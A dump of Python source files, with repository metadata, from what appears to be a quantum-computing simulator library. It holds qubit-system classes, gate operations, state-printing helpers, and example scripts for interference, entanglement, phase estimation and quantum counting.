f\":0{index_length}\" + '}'\n length = 21 - index_length\n for index, state in enumerate(qbsys.states[:, 0]):\n prob = np.square(np.abs(state))\n angle = np.angle(state)\n bar_length = int((prob + 1e-8) * length)\n print('∣' + format_str.format(index) + '❭', end=\" \")\n Simag = np.abs(state.imag)\n if state.imag >= 0.:\n print(f\"[{state.real: .4f} + {Simag:.4f}i]\", end=\" \")\n else:\n print(f\"[{state.real: .4f} - {Simag:.4f}i]\", end=\" \")\n print(f\"| {'='*bar_length}{' '*(length-bar_length)} |\", end=\" \")\n print(f\"[prob: {prob:.4f}] [rad:{angle: .4f}]\")\n print()\n\n\ndef DumpSystemFig(qbsys: QubitsSystem, block: bool = True) -> None:\n \"\"\"以字符串形式打印系统所有状态\n\n 使用前请确保已安装 matplotlib\n\n Args:\n sys: 需要查看的系统\"\"\"\n if not have_matplotlib:\n raise ModuleNotFoundError(\"No module named 'matplotlib'\")\n states = qbsys.states[:, 0]\n prob = np.square(np.abs(states))\n angle = np.angle(states)\n index_length = 1 + int(qbsys.nQubits * log10_2)\n format_str = \"∣{\" + f\":0{index_length}\" + \"}❭\"\n lable_range = range(0, len(states), max(len(states) >> 5, 1))\n lables = [format_str.format(i) for i in lable_range]\n color = [\"#{:02X}{:02X}{:02x}\".format(*ColorWheel2RGB(theta))\n for theta in angle]\n lw = 0.75 if len(states) < 128 else 0.0\n plt.clf()\n plt.xticks(lable_range, lables, size=6,\n rotation=\"vertical\", fontfamily=\"monospace\")\n plt.ylim(0., 1.1)\n plt.ylabel(\"Probability\")\n plt.bar(range(len(states)), prob, color=color, ec=\"#000000\", ls='-', lw=lw)\n plt.show(block=block)\n\n\n# TODO def DumpRegisterText(qbs: Qubits) -> None:\n# TODO def DumpRegisterFig(qbs: Qubits, block: bool = True) -> None:\n" }, { "alpha_fraction": 0.5653342008590698, "alphanum_fraction": 0.5918710231781006, "avg_line_length": 29.37755012512207, "blob_id": "38041e61276e29c797f4c746e09aa33e8201f716", "content_id": "0bc8612dbfb67010bed7b146bee02634861780fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3405, "license_type": "no_license", "max_line_length": 79, "num_lines": 98, "path": "/examples/7-QuantumCounting.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport sys\nimport os\nsys.path.append(os.path.dirname(os.path.dirname(__file__)))\n\nfrom nyasQuantumCalculate import *\nfrom numpy import pi, sin\n\n\nOptions.autoNormalize = False\n\n\"\"\"细节可以参考 https://www.bilibili.com/read/cv11088535\"\"\"\n\n\n###############################################################################\n\"\"\" 图形着色部分代码 \"\"\"\nedges = [(0, 1), (0, 2), (0, 3), (1, 2), (1, 3), (2, 3)]\nnColorBits = 2\nnVertex = max(max(edge) for edge in edges) + 1\ndef Equality(registerA: Qubits, registerB: Qubits, target: Qubit) -> None:\n # 把registerA和registerB按位做XOR, 结果储存在registerB\n for q0, q1 in zip(registerA, registerB):\n Builtin.CNOT(q0, q1)\n # registerB按位取反\n ApplyToEach(Builtin.X, registerB)\n # 如果registerB全部为1, 说明registerA=registerB, 则翻转target的状态\n Controlled(Builtin.X, registerB, target)\n # 反向计算所有改变registerB的逻辑以还原registerB\n ApplyToEach(Builtin.X, registerB)\n for q0, q1 in zip(registerA, registerB):\n Builtin.CNOT(q0, q1)\ndef GraphColoring(register: Qubits, target: Qubit) -> None:\n colors = [register[2*i:2*i+2] for i in range(5)]\n with TemporaryQubits(register.system, len(edges)) as tmpQubits:\n for (i0, i1), tmpQ in zip(edges, tmpQubits):\n Equality(colors[i0], colors[i1], tmpQ)\n ApplyToEach(Builtin.X, tmpQubits)\n Controlled(Builtin.X, tmpQubits, target)\n # 退出前还原tmpQubits\n 
        ApplyToEach(Builtin.X, tmpQubits)\n        for (i0, i1), tmpQ in zip(edges, tmpQubits):\n            Equality(colors[i0], colors[i1], tmpQ)\n\n\n###############################################################################\n\n\ndef GroverOperator(register: Qubits) -> None:\n    ApplyToEach(Builtin.H, register)\n    ApplyToEach(Builtin.X, register)\n    Controlled(Builtin.Z, register[:-1], register[-1])\n    ApplyToEach(Builtin.X, register)\n    ApplyToEach(Builtin.H, register)\n    #Phase(pi)(register[-1])\n\n    # With the extra `Phase(pi)(register[-1])` line the Grover operator is\n    # defined as G = W(2|0❭❬0|-I)W, and the count M is recovered from the\n    # measurement as 2**n*sin(pi*2*phi)**2. Without that line the operator\n    # is G = W(I-2|0❭❬0|)W, and M = 2**n*sin(pi*(2*phi-0.5))**2\n\n\nn = nVertex * nColorBits  # number of qubits running the Grover iteration\nm = n + 2  # precision of the phase estimation\n\nqbsys = QubitsSystem(1 + n)\nA = qbsys[0]  # the reduced phase estimation needs 1 qubit instead of m\nB = qbsys[1:]  # qubits for the Grover iteration\n\n# Prepare the superposed eigenstate\nApplyToEach(Builtin.H, B)\n# Wrap a single Grover iteration into a function\ndef RunGroverStep():\n    with TemporaryQubit(qbsys) as tmp:\n        # Use phase kickback to turn the marking oracle into a phase oracle\n        Builtin.X(tmp)\n        Builtin.H(tmp)\n        GraphColoring(B, tmp)\n        Builtin.H(tmp)\n        Builtin.X(tmp)\n    GroverOperator(B)\n\n\n# Phase estimation\nphi = 0.\nfor i in range(m):\n    Builtin.H(A)\n    for _ in range(2 ** (m - i - 1)):\n        Controlled(RunGroverStep, A.asQubits())\n    R1(-2 * pi * phi)(A)\n    Builtin.H(A)\n    res = Builtin.M(A)\n    if res:\n        Builtin.X(A)\n    phi = phi / 2 + int(res) / 4\n\n# Output and reset the system\nprint(\"Measured\", round(2**n * sin(pi*(2*phi-0.5))**2), \"correct answers\")\nBuiltin.RA(qbsys[:])\n" }, { "alpha_fraction": 0.6716312170028687, "alphanum_fraction": 0.7021276354789734, "avg_line_length": 18.799999237060547, "blob_id": "27925144606713d278a7d362cef10f68ca3b49663", "content_id": "795b2995c4258f64905999897cbea6b3749ee963", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2302, "license_type": "no_license", "max_line_length": 59, "num_lines": 75, "path": "/examples/1-InterferenceAndEntanglement.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport sys\nimport os\nsys.path.append(os.path.dirname(os.path.dirname(__file__)))\n\nfrom nyasQuantumCalculate import *\n\n\n\n#############  Interference\n\n# Quantum states behave like waves: like ripples on water, they amplify\n# where crest meets crest or trough meets trough,\n# and cancel where trough meets crest\n\n# Prepare a qubit holding ∣0❭ and ∣1❭ at the same time, with equal phases\nsytm = QubitsSystem(1)\nq = sytm[0]\n\nBuiltin.H(q)\nDumpSystemText(q.system)\n\n# Send the qubit through the \"double slit\": at ∣0❭ the phases agree and\n# amplify, while at ∣1❭ they disagree and cancel\nBuiltin.H(q)\nDumpSystemText(q.system)\n# Of course this just says that H is its own inverse, so applying H twice\n# restores the original state\n# - but isn't it prettier to picture H as a double slit? (jk\nBuiltin.R(q)  # resetting the system after each experiment is a good habit\n\n# Now prepare a similar qubit, but with the ∣1❭ phase off by pi (-1 = e^(i*pi))\nBuiltin.H(q)\nBuiltin.Z(q)\nDumpSystemText(q.system)\n\n# Through the \"double slit\" again: thanks to the phase offset, this time\n# ∣0❭ cancels and ∣1❭ amplifies\nBuiltin.H(q)\nDumpSystemText(q.system)\n\n# Clean up the leftover objects\nBuiltin.RA(sytm.getQubits())\nq = None\nsytm = None\n# Setting a name to None lets Python reclaim the object\n# *provided nothing else still references it\n\n\n\n#################  Entanglement\n\n# In quantum mechanics, entanglement means the states of two or more\n# particles are bound together: measuring one of them collapses the\n# others into a matching state\n\n# First prepare a two-qubit system in an entangled state\nsytm = QubitsSystem(2)\nq0 = sytm[0]\nq1 = sytm[1]\n\nBuiltin.H(q0)\nBuiltin.CNOT(q0, q1)\nDumpSystemText(q0.system)\n\n# ∣0❭ (∣00❭) is the state where both qubits are 0\n# ∣1❭ (∣01❭) is the state where the second qubit is 0 and the first is 1,\n# and so on\n\n# The system only has weight on ∣0❭ and ∣3❭, none on ∣1❭ and ∣2❭,\n# so when the first qubit measures 0 the second must be 0 too; same for 1\nprint(f\"Measure Qubit-0: {Builtin.M(q0)}\")\nDumpSystemText(q0.system)\nprint(f\"Measure Qubit-1: {Builtin.M(q1)}\")\n\nBuiltin.RA(sytm.getQubits())\n# Try re-running this block a few times\n\nq0 = None\nq1 = None\nsytm = None\n" }, { "alpha_fraction": 0.5331347584724426,
"alphanum_fraction": 0.5599404573440552, "avg_line_length": 22.15517234802246, "blob_id": "91d2f77753ba4e0724684e1e842df5758087578a", "content_id": "092fb888e91556f01d006994aeab5002e0e8aab3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1872, "license_type": "no_license", "max_line_length": 79, "num_lines": 58, "path": "/examples/6-PhaseEstimation.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport sys\nimport os\nsys.path.append(os.path.dirname(os.path.dirname(__file__)))\n\nfrom numpy import pi, sqrt\nfrom nyasQuantumCalculate import *\n\n\nOptions.autoNormalize = False\n\n\"\"\"细节可以参考 https://www.bilibili.com/read/cv10995770\"\"\"\n\n\n###############################################################################\n\n# 需要求特征值的位门\nU = Rx(2*pi * sqrt(2))\n\n###############################################################################\n\"\"\"这个位门U有两个特征态和特征值\n|u1❭ = |+❭; λ1 = exp(-pi*i*sqrt(2))\n|u2❭ = |-❭; λ2 = exp( pi*i*sqrt(2))\n\n相位估计是求特征值exp(2*pi*i*φ)里的φ, 其中φ取值[0,1).\n也就是说U里的两个相位Φ为 φ1 = 1-sqrt(2)/2; φ2 = sqrt(2)/2\n\"\"\"\n\n###############################################################################\n\n# 初始化量子位系统, n为求解精度\nn = 8\nqbsys = QubitsSystem(n + 1)\nB = qbsys[0]\nA = qbsys[1:]\n\n# 制备叠加特征态, 因为这里的叠加特征态是|0❭, 所以什么也不做\n# 需要注意的是叠加特征态在运行相位估计之后会与相位量子位纠缠在一起\n# 这时候是无法抛弃储存特征态的量子位的\n\n# 相位评估电路\nApplyToEach(Builtin.H, A)\nfor i, qb in enumerate(A):\n for _ in range(2 ** i):\n Controlled(U, qb.asQubits(), B)\n# 因为上面的控制顺序已经反序, 则QFT并不需要再次反序\nwith TemporaryOptions.QFTswap(False):\n Builtin.IQFT(A)\n\n# 加一个H门是为了可视化更明显, 不加H门之前系统总状态有4个峰值\n# 加了H门后变为两个峰值, 看上去像是改变了相位估计的结果, 但实际上是没有的\nBuiltin.H(B)\n# 查看目前系统的总状态\nDumpSystemFig(qbsys)\n# 测量量子位, 重置系统, 输出\nresult = Builtin.MA(A)\nBuiltin.RA(qbsys[:])\nprint(\"测得φ为\", Utils.Bools2Int(result) / 2 ** n)\n" }, { "alpha_fraction": 0.4064748287200928, "alphanum_fraction": 0.4064748287200928, "avg_line_length": 15.352941513061523, "blob_id": "a08cac1ff7e1870cf58615adc2f24de43f44e670", "content_id": "1500f1433c851a2ae520c1d905b369cc86e53875", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 278, "license_type": "no_license", "max_line_length": 50, "num_lines": 17, "path": "/nyasQuantumCalculate/Builtin.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "from .Operate import *\n\n\n__all__ = [\n # ControlMethod\n \"CNOT\", \"CCNOT\",\n # Measure\n \"M\", \"MA\",\n # QFT\n \"QFT\", \"IQFT\", \"AQFT\", \"IAQFT\",\n # Reset\n \"R\", \"RA\",\n # SingleQubitGate\n \"I\", \"H\", \"X\", \"Y\", \"Z\", \"S\", \"T\", \"SR\", \"TR\",\n # Swap\n \"SWAP\",\n]\n" }, { "alpha_fraction": 0.5314494371414185, "alphanum_fraction": 0.5369188785552979, "avg_line_length": 23.10988998413086, "blob_id": "1ee2f9c793d0785b05e5c6cf794e72c62697d736", "content_id": "25b91531a04aa99a25b49cb59eb082cd88901f91", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2524, "license_type": "no_license", "max_line_length": 79, "num_lines": 91, "path": "/nyasQuantumCalculate/System/Qubit.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom typing import Any\n\nfrom .QubitsSystem import *\n\n\n__all__ = [\"Qubit\", \"TemporaryQubit\"]\n\n\nclass Qubit:\n \"\"\"Qubit(QubitsSystem, int)\n\n 单个量子位对象, 可以通过 `qbsys.getQubit(idx)` 或 `qbsys[idx]` 得到.\n\n 
    \"\"\"\n\n    def __init__(self, qbsys: QubitsSystem, idx: int) -> None:\n        \"\"\"Initialize\n\n        Args:\n            qbsys: the qubits system this qubit belongs to\n            idx: the qubit index, from 0 to qbsys.nQubits-1\"\"\"\n        if not 0 <= idx < qbsys.nQubits:\n            raise ValueError(f\"The qubit indexed {idx} does not exist.\")\n        self.system = qbsys\n        self.index = idx\n\n    def __str__(self) -> str:\n        return f\"Qubit({self.index})\"\n\n    def __repr__(self) -> str:\n        return f\"Qubit({self.index} in system with id:{self.system.id})\"\n\n    def __add__(self, other: Any) -> Any:\n        raise NotImplementedError\n\n    def asQubits(self) -> Any:\n        \"\"\"Return the Qubits object equivalent to this qubit (same system,\n        same index)\n\n        Returns:\n            (Qubits)\"\"\"\n        raise NotImplementedError\n\n\nclass TemporaryQubit:\n    \"\"\"TemporaryQubit(QubitsSystem)\n\n    Use with a with-statement to create a temporary Qubit; its storage is\n    destroyed when the with-block exits. Remember to release the temporary\n    Qubit object after use, or unnecessary errors may follow.\n\n    To use:\n    >>> qbsys = QubitsSystem(4)\n    >>> qbsys.nQubits\n    4\n    >>> with TemporaryQubit(qbsys) as tmpQb:\n    ...     print(qbsys.nQubits, tmpQb)\n    ...\n    5 Qubit(4)\n    >>> qbsys.nQubits\n    4\n    >>> del tmpQb  # release the temporary Qubit object\n    \"\"\"\n\n    def __init__(self, qbsys: QubitsSystem):\n        self.system = qbsys\n\n    def __enter__(self) -> Qubit:\n        self.system.addQubits(1)\n        return Qubit(self.system, self.system.nQubits - 1)\n\n    def __exit__(self, *error: Any) -> None:\n        self.system.popQubits(1)\n\n\n###############################################################################\n#################  * You should not call the methods below  ##################\n###############################################################################\n\n\ndef QubitsSystem_getQubit(self: QubitsSystem, idx: int) -> Qubit:\n    return Qubit(self, idx)\n\n\nQubitsSystem.getQubit = QubitsSystem_getQubit\n" }, { "alpha_fraction": 0.5240384340286255, "alphanum_fraction": 0.5328525900840759, "avg_line_length": 29.62576675415039, "blob_id":
False\n\n def __del__(self) -> None:\n print(f\"Cleaning up qubits system with id:{self._id} ...\")\n if Options.checkCleaningSystem and \\\n not equal0(np.abs(\n self.statesNd.__getitem__((*([0] * self.nQubits),))\n ) - 1.):\n raise RuntimeError(\"Before cleaning up qubits system, \"\n \"all qubits in system should be reset.\")\n\n @property\n def nQubits(self) -> int: return self.statesNd.ndim\n\n @property\n def nControllingQubits(self) -> int: return len(self._ctlBits)\n\n @property\n def id(self) -> int: return self._id\n\n @property\n def states(self) -> np.ndarray:\n # shape of states should be (2^n, 1) (column vector)\n indexes = self._qIndex[::-1] \\\n if Options.littleEndian else self._qIndex\n return self.statesNd. \\\n transpose(indexes). \\\n reshape([-1, 1])\n\n def __str__(self) -> str:\n return f\"QubitsSystem({self.nQubits})\"\n\n def __repr__(self) -> str:\n return f\"QubitsSystem(nQubits:{self.nQubits},id:{self._id})\"\n\n def __getitem__(self, idx: Union[int, slice]) -> Any:\n raise NotImplementedError\n\n def getQubit(self, idx: int) -> Any:\n \"\"\"得到系统内的一个量子位\n\n Args:\n idx: 量子位的索引, 应该从0开始到nQubits-1\n\n Returns:\n (Qubit)可以被量子位过程作用的量子位\"\"\"\n raise NotImplementedError\n\n def getQubits(self, *idxs: int) -> Any:\n \"\"\"得到系统内的多个量子位\n\n Args:\n idxs: 量子位的索引, 应该从0开始到nQubits-1\n\n Returns:\n (Qubit)可以被量子位过程作用的量子位\"\"\"\n raise NotImplementedError\n\n def normalize(self) -> None:\n \"\"\"归一化系统\"\"\"\n self.statesNd /= np.sqrt(sss(self.statesNd))\n\n def getTracker(self):\n \"\"\"返回系统内记录步骤的对象\n\n Returns:\n (List[Tuple[Tuple[int, ...], Tuple[int, ...], str]])\n 列表内按顺序每项是系统经历的步骤. 步骤里第一项是控制位\n (如果不是控制位门则为空), 第二项是被控制位, 第三项是步骤的名字\n (由外部提供). 比如:\n\n [((), (0,), 'H'), ((0,), (1,), 'X'), ((), (1,), 'Z'),\n ((), (0, 1), 'SWAP'), ((), (0,), 'MEASURE'), ((), (1,), 'MEASURE'),\n ((), (0,), 'RESET'), ((), (1,), 'RESET')]\n 步骤: 先把H门作用在第0位, 然后把第0位设位控制位, 第1位设为被控制位, 作\n 用CNOT, 把Z门作用在第1位, 交换第0位和第1位, 测量第0和第1位, 重置第0和\n 第1位\"\"\"\n return self._tracker\n\n def restart(self) -> None:\n self.statesNd *= 0.\n self.statesNd.__setitem__((*([0] * self.nQubits),), 1.)\n self._ctlBits.clear()\n self._ctlBitPkgs.clear()\n self._qIndex = list(range(self.nQubits))\n self._qIndexR = list(range(self.nQubits))\n self._tracker.clear()\n self.stopTracking = False\n\n # TODO def isEntangled(self, idx: int) -> bool:\n\n ########################## Related to tracking ##########################\n\n def canTrack(self) -> bool:\n \"\"\"系统是否可以跟踪量子位操作\n\n 把属性stopTracking可以停止系统里的跟踪\n\n Returns:\n 返回当前系统是否可以跟踪\"\"\"\n return Options.allowTracking and not self.stopTracking\n\n def addTrack(self, name: str, *idxs: int) -> None:\n \"\"\"添加跟踪条目\n\n 调用此方法会无视任何条件, 给跟踪器加上条目. 
正常使用应该要\n 先使用`canTrack()`判断是否可以跟踪再进行添加.\n\n Args:\n name: 操作的名字\n idxs: 被控制位 或 操作的作用位\"\"\"\n self._tracker.append((tuple(self._ctlBits), tuple(idxs), name))\n\n ###########################################################################\n ################## * 一般情况下, 你不应该调用以下方法 #######################\n ###########################################################################\n\n #################### Related to controlling qubits ######################\n\n def checkQuickIndexCorrect(self) -> bool:\n \"\"\"检查内部快速索引是否正常\n\n 没有实际用途, 只在 DEBUG 时会用上.\"\"\"\n if len(self._qIndex) != self.statesNd.ndim:\n return False\n if len(self._qIndex) != len(self._qIndexR):\n return False\n if not all(idx0 == idx1\n for idx0, idx1 in\n zip(self._ctlBits, self._qIndexR[-len(self._ctlBits):])):\n return False\n for (idx0, idxx0), (idx1, idxx1) in zip(\n enumerate(self._qIndex),\n enumerate(self._qIndexR)\n ):\n if self._qIndex[idxx1] != idx1:\n return False\n if self._qIndexR[idxx0] != idx0:\n return False\n return True\n\n def isControlling(self, idx: int) -> bool:\n return idx in self._ctlBits\n\n def statesNdIndex(self, idx: int, reverse: bool = False) -> int:\n \"\"\"内部数组的索引\n\n 当存在控制位时, 内部数组的索引与量子位索引不一致, 这个\n 方法是用于得到正确的索引的. 无论在什么时候都没必要调用这个方法\n\n Args:\n idx: 量子位的索引, 应该从0开始到nQubits-1.\n reverse: 当为True, 从数组索引得到量子位索引\n\n Returns:\n 索引\"\"\"\n if not 0 <= idx < self.nQubits:\n raise ValueError(f\"The qubit indexed {idx} does not exist.\")\n if not self._ctlBits:\n return idx\n if reverse:\n return self._qIndexR[idx]\n return self._qIndex[idx]\n\n def addControllingQubits(self, *idxs: int) -> None:\n \"\"\"增加一组控制位*\n\n 用于多重控制的情况, 新增控制位不可以与已有控制位相同, 使用\n popControllingQubiys()来取消控制位.\n\n *请使用 `Controlled(opr, ctlQbs, ...)` 来控制过程\n\n Args:\n idxs: 量子位的索引, 应该从0开始到nQubits-1\"\"\"\n if not idxs:\n return\n if any(idx in self._ctlBits for idx in idxs):\n raise ValueError(\"Controlling bit is added repeatedly.\")\n self._ctlBitPkgs.append(list(idxs))\n self.updateControllingQubits()\n\n def popControllingQubits(self) -> None:\n \"\"\"删除一组控制位\n\n 删除最近添加的一组控制位\"\"\"\n if not self._ctlBitPkgs:\n return\n self._ctlBitPkgs.pop()\n self.updateControllingQubits()\n\n def updateQuickIndex(self) -> None:\n \"\"\"更新快速索引\n\n 使用_ctlBits更新_qIndex和_qIndexR\"\"\"\n if not self._ctlBitPkgs:\n self._qIndex = list(range(self.nQubits))\n self._qIndexR = list(range(self.nQubits))\n return\n self._qIndexR = [index for index in range(self.nQubits)\n if index not in self._ctlBits]\n self._qIndexR += self._ctlBits\n if len(self._qIndex) != self.nQubits:\n self._qIndex = list(range(self.nQubits))\n for index0, index1 in enumerate(self._qIndexR):\n self._qIndex[index1] = index0\n\n def updateControllingQubits(self) -> None:\n \"\"\"更新控制位\n\n 使用_ctlBitPkgs来更新_ctlBits\"\"\"\n if self._ctlBits:\n self.statesNd = self.statesNd.transpose(self._qIndex)\n self._ctlBits.clear()\n if not self._ctlBitPkgs:\n self.updateQuickIndex()\n return\n for pkg in self._ctlBitPkgs:\n self._ctlBits += pkg\n self._ctlBits.sort()\n self.updateQuickIndex()\n self.statesNd = self.statesNd.transpose(self._qIndexR)\n\n ##################### Related to temporary qubit ########################\n\n def addQubits(self, nQubits: int) -> None:\n \"\"\"增加量子位*\n\n 在系统里增加nQubits个量子位, 并分配在其他量子位末端.\n\n *请使用 `TemporaryQubit` 或 `TemporaryQubits` 分配临时量子位\n\n Args:\n nQubits: 新增量子位的数量\"\"\"\n if nQubits < 0:\n raise ValueError(f\"Cannot add {nQubits} qubits.\")\n if nQubits == 0:\n return\n if self._ctlBits:\n self.statesNd = self.statesNd.transpose(self._qIndex)\n new_states = 
np.zeros([2] * (self.nQubits + nQubits), np.complex128)\n new_states.__setitem__((..., *([0] * nQubits)), self.statesNd)\n self.statesNd = new_states\n self.updateQuickIndex()\n if self._ctlBits:\n self.statesNd = self.statesNd.transpose(self._qIndexR)\n\n def popQubits(self, nQubits: int) -> None:\n \"\"\"移除量子位\n\n 移除系统末端的nQubits个量子位, 量子位在被移除前需要被重置, 并且确保\n 被移除的量子位不是控制位\n\n Args:\n nQubits: 移除量子位的数量\"\"\"\n if nQubits < 0:\n raise ValueError(f\"Cannot pop {nQubits} qubits.\")\n if nQubits == 0:\n return\n if any(idx >= self.nQubits - nQubits for idx in self._ctlBits):\n raise ValueError(\"The qubit removed is controlling qubit.\")\n if self._ctlBits:\n self.statesNd = self.statesNd.transpose(self._qIndex)\n states = self.statesNd.__getitem__((..., *([0] * nQubits)))\n if not equal0(sss(states) - 1.):\n if self._ctlBits:\n self.statesNd = self.statesNd.transpose(self._qIndexR)\n raise RuntimeError(\"The qubit removed is not reset.\")\n self.statesNd = states.copy()\n self.updateQuickIndex()\n if self._ctlBits:\n self.statesNd = self.statesNd.transpose(self._qIndexR)\n" }, { "alpha_fraction": 0.48996156454086304, "alphanum_fraction": 0.49562153220176697, "avg_line_length": 28.632911682128906, "blob_id": "fc60fc1388e816311a6317d838b0c15d875ca9ad", "content_id": "92dbe3bbdbdfef64f7cd833216e195b8bf664056", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9364, "license_type": "no_license", "max_line_length": 81, "num_lines": 316, "path": "/nyasQuantumCalculate/RevCal/Operate.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom typing import Any, Iterable, List, TypeVar\n\nfrom .System import *\nfrom nyasQuantumCalculate.Utils import Int2Bools\n\n\n__all__ = [\"BitsOperation\", \"Controlled\", \"ControlledOnBools\", \"ControlledOnInt\",\n \"ApplyToEach\", \"ApplyFromBools\", \"ApplyFromInt\", \"Toffoli\",\n \"M\", \"MA\", \"R\", \"RA\", \"I\", \"X\", \"CNOT\", \"CCNOT\", \"SWAP\"]\n\n\nclass BitsOperation:\n def __init__(self, name: str = \"\",\n controllable: bool = False,\n trackable: bool = False,\n **kwargs: Any) -> None:\n self.name = name\n self.controllable = controllable\n self.trackable = trackable\n\n # def call(self, ...) 
-> ...: ...\n\n def __call__(self, *args: Any, **kwargs: Any) -> Any:\n raise NotImplementedError\n\n\n###############################################################################\n###############################################################################\n\n\nclass _I(BitsOperation):\n def __init__(self) -> None:\n super().__init__()\n self.name = \"I\"\n self.controllable = True\n self.trackable = False\n\n def call(self, b: Bit) -> None:\n pass\n\n def __call__(self, b: Bit) -> None:\n bsys = b.system\n sysStopTrack = bsys.stopTracking\n if bsys.canTrack() and self.trackable:\n bsys.addTrack(self.name, b.index)\n bsys.stopTracking = True\n self.call(b)\n if not sysStopTrack:\n bsys.stopTracking = False\n\n\nclass _X(BitsOperation):\n def __init__(self) -> None:\n super().__init__()\n self.name = \"X\"\n self.controllable = True\n self.trackable = True\n\n def call(self, b: Bit) -> None:\n b.system.states[b.index] = not b.system.states[b.index]\n\n def __call__(self, b: Bit) -> None:\n bsys = b.system\n sysStopTrack = bsys.stopTracking\n if bsys.canTrack() and self.trackable:\n bsys.addTrack(self.name, b.index)\n bsys.stopTracking = True\n self.call(b)\n if not sysStopTrack:\n bsys.stopTracking = False\n\n\nI = _I()\nX = _X()\nSingleBitGate = TypeVar(\"SingleBitGate\", _I, _X)\n\n\n###############################################################################\n###############################################################################\n\n\ndef Controlled(opr: BitsOperation, ctlBs: Bits,\n *args: Any, **kwargs: Any) -> Any:\n if not opr.controllable:\n raise ValueError(\"Target process is uncontrollable.\")\n bsys = ctlBs.system\n bsys.addControllingBits(*ctlBs.indexes)\n if all(bsys.states[idx] for idx in bsys.ctlBits):\n opr(*args, **kwargs)\n bsys.popControllingBits()\n\n\ndef ControlledOnBools(opr: BitsOperation, bools: Iterable[bool], ctlBs: Bits,\n *args: Any, **kwargs: Any) -> Any:\n for bit, b in zip(bools, ctlBs):\n if not bit:\n X(b)\n result = Controlled(opr, ctlBs, *args, **kwargs)\n for bit, b in zip(bools, ctlBs):\n if not bit:\n X(b)\n return result\n\n\ndef ControlledOnInt(opr: BitsOperation, integer: int, ctlBs: Bits,\n *args: Any, **kwargs: Any) -> Any:\n bits = Int2Bools(integer, len(ctlBs))\n result = ControlledOnBools(opr, bits, ctlBs, *args, **kwargs)\n return result\n\n\nclass _CNOT(BitsOperation):\n def __init__(self) -> None:\n super().__init__()\n self.name = \"CNOT\"\n self.controllable = True\n\n def call(self, b0: Bit, b1: Bit) -> None:\n Controlled(X, b0.asBits(), b1)\n\n def __call__(self, b0: Bit, b1: Bit) -> None:\n if b0.system.id != b1.system.id:\n raise ValueError(\"Two bits are in different bit system.\")\n bsys = b0.system\n sysStopTrack = bsys.stopTracking\n if bsys.canTrack() and self.trackable:\n bsys.addTrack(self.name, b0.index, b1.index)\n bsys.stopTracking = True\n self.call(b0, b1)\n if not sysStopTrack:\n bsys.stopTracking = False\n\n\nclass _CCNOT(BitsOperation):\n def __init__(self) -> None:\n super().__init__()\n self.name = \"CCNOT\"\n self.controllable = True\n\n def call(self, b0: Bit, b1: Bit, b2: Bit) -> None:\n Controlled(X, b0 + b1, b2)\n\n def __call__(self, b0: Bit, b1: Bit, b2: Bit) -> None:\n if b0.system.id != b1.system.id or \\\n b0.system.id != b2.system.id:\n raise ValueError(\"Three bits are in different bit system.\")\n bsys = b0.system\n sysStopTrack = bsys.stopTracking\n if bsys.canTrack() and self.trackable:\n bsys.addTrack(self.name, b0.index, b1.index, b2.index)\n bsys.stopTracking = True\n self.call(b0, 
b1, b2)\n if not sysStopTrack:\n bsys.stopTracking = False\n\n\n###############################################################################\n###############################################################################\n\n\ndef ApplyToEach(gate: SingleBitGate, bs: Bits) -> None:\n for b in bs:\n gate(b)\n\n\ndef ApplyFromBools(gate: SingleBitGate, bools: Iterable[bool],\n bs: Bits) -> None:\n for bit, b in zip(bools, bs):\n if bit:\n gate(b)\n\n\ndef ApplyFromInt(gate: SingleBitGate, integer: int, bs: Bits) -> None:\n bits = Int2Bools(integer, len(bs))\n ApplyFromBools(gate, bits, bs)\n\n\n###############################################################################\n###############################################################################\n\n\nclass _SWAP(BitsOperation):\n def __init__(self) -> None:\n super().__init__()\n self.name = \"SWAP\"\n self.trackable = True\n\n def call(self, b0: Bit, b1: Bit) -> None:\n bsys = b0.system\n tmp = bsys.states[b0.index]\n bsys.states[b0.index] = bsys.states[b1.index]\n bsys.states[b1.index] = tmp\n\n def __call__(self, b0: Bit, b1: Bit) -> None:\n if b0.system.id != b1.system.id:\n raise ValueError(\"Two bits are in different bit system.\")\n bsys = b0.system\n sysStopTrack = bsys.stopTracking\n if bsys.canTrack() and self.trackable:\n bsys.addTrack(self.name, b0.index, b1.index)\n bsys.stopTracking = True\n self.call(b0, b1)\n if not sysStopTrack:\n bsys.stopTracking = False\n\n\n###############################################################################\n###############################################################################\n\n\nclass _RESET(BitsOperation):\n def __init__(self) -> None:\n super().__init__()\n self.name = \"RESET\"\n self.trackable = True\n\n def call(self, b: Bit) -> None:\n b.system.states[b.index] = False\n\n def __call__(self, b: Bit) -> None:\n bsys = b.system\n sysStopTrack = bsys.stopTracking\n if bsys.canTrack() and self.trackable:\n bsys.addTrack(self.name, b.index)\n bsys.stopTracking = True\n self.call(b)\n if not sysStopTrack:\n bsys.stopTracking = False\n\n\nclass _RESETALL(BitsOperation):\n def __init__(self) -> None:\n super().__init__()\n self.name = \"RESETALL\"\n self.trackable = True\n\n def call(self, bs: Bits) -> None:\n states = bs.system.states\n for index in bs.indexes:\n states[index] = False\n\n def __call__(self, bs: Bits) -> None:\n bsys = bs.system\n sysStopTrack = bsys.stopTracking\n if bsys.canTrack() and self.trackable:\n bsys.addTrack(self.name, *bs.indexes)\n bsys.stopTracking = True\n self.call(bs)\n if not sysStopTrack:\n bsys.stopTracking = 